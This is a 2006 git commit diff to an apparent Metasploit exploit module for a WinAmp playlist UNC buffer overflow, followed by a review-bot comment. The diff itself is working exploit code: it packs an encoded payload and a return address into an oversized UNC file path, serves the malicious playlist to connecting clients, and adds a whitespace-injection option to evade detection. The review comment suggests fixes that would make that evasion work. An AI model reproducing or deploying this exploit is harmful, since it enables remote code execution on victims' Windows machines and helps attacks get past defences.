general cleanups

add space evasions to the playlist


git-svn-id: file:///home/svn/incoming/trunk@3495 4d416f70-5f16-0410-b530-b9f4589650da
unstable
bmc 2006-02-03 18:28:13 +00:00
parent 792b3a8ad4
commit fe608d1676
1 changed files with 29 additions and 15 deletions


@ -21,7 +21,7 @@ class Exploits::Windows::Browser::WinAmp_Playlist_UNC < Msf::Exploit::Remote
},
'License' => MSF_LICENSE,
'Author' =>
[
[
'hdm',
'Faithless <rhyskidd [at] gmail.com>'
],
@ -58,6 +58,10 @@ class Exploits::Windows::Browser::WinAmp_Playlist_UNC < Msf::Exploit::Remote
],
'DisclosureDate' => 'Jan 29 2006',
'DefaultTarget' => 0))
register_evasion_options([
OptBool.new('PlaylistSpaceInjection', [false, 'Add junk spaces in between each entry item in the playlist"', 'false'])
])
end
def check_dependencies
@ -82,6 +86,8 @@ class Exploits::Windows::Browser::WinAmp_Playlist_UNC < Msf::Exploit::Remote
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
# Transmit the compressed response to the client
send_response(cli, generate_playlist(p), { 'Content-Type' => 'text/plain' })
@ -89,12 +95,9 @@ class Exploits::Windows::Browser::WinAmp_Playlist_UNC < Msf::Exploit::Remote
end
def generate_playlist(payload)
pcnt = rand(10)+10;
slen = "%x" % (rand(1024)+30)
name = Rex::Text.rand_text_alphanumeric(rand(32)+1)
file = Rex::Text.rand_text_english(1026)
file[1022 , 4] = [target.ret].pack('V')
file[0, payload.encoded.length] = payload.encoded
@ -102,23 +105,34 @@ class Exploits::Windows::Browser::WinAmp_Playlist_UNC < Msf::Exploit::Remote
play =
"[playlist]\r\n" +
generate_songs(pcnt) +
"File" + (pcnt+1).to_s + "=\\\\#{file}\r\n" +
"Title" + (pcnt+1).to_s + "=#{name}\r\n" +
"Length" + (pcnt+1).to_s + "=#{slen}\r\n" +
"NumberOfEntries=" + (pcnt+1).to_s + "\r\n" +
"Version=2\r\n"
generate_song(pcnt + 1, "\\\\#{file}") +
generate_line('NumberOfEntries', "#{pcnt+1}") +
generate_line('Version', '2')
return play
end
def generate_space
if datastore['PlaylistSpaceInjection'] == true
return Rex::Text.rand_text(rand(100)+1, nil, " \t")
else
return ''
end
end
def generate_song (id, file)
return generate_line("File#{id}", file) +
generate_line("Title#{id}", Rex::Text.rand_text_alphanumeric(rand(64)+1)) +
generate_line("Length#{id}", "%x" % (rand(1024) + 30))
end
def generate_line (key, value)
return generate_space + key + generate_space + '=' + generate_space + value + generate_space + "\r\n"
end
def generate_songs(cnt)
songs = ''
1.upto(cnt) do |i|
name = Rex::Text.rand_text_alphanumeric(rand(64)+1)
file = Rex::Text.rand_text_alphanumeric(rand(64)+1)
slen = "%x" % (rand(1024)+30)
songs << "File" + i.to_s + "=" + file + "\r\n"
songs << "Title" + i.to_s + "=" + name + "\r\n"
songs << "Length" + i.to_s + "=" + slen + "\r\n"
songs << generate_song(i, Rex::Text.rand_text_alphanumeric(rand(64)+1))
end
return songs
end
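Review bot: `generate_space` tests `datastore['PlaylistSpaceInjection'] == true`, yet the option registered in the earlier hunk (`register_evasion_options`) gives its default as the string `'false'`; if the datastore returns the option's string form rather than a normalized boolean, the comparison never matches and the evasion is silently a no-op, so either register the default as the boolean `false` (if the datastore normalizes OptBool values) or test the string form, `if datastore['PlaylistSpaceInjection'].to_s =~ /\A(t|y|1)/i`. That same registration line also has a stray double quote at the end of its description, `'... in the playlist"'`, which should read `'Add junk spaces in between each entry item in the playlist'`. As a point of style, `def generate_song (id, file)` and `def generate_line (key, value)` put a space before the parameter list, which the rest of the file does not do. The visible line counts of this last hunk do not match its header, so its closing lines may be cut off on this page.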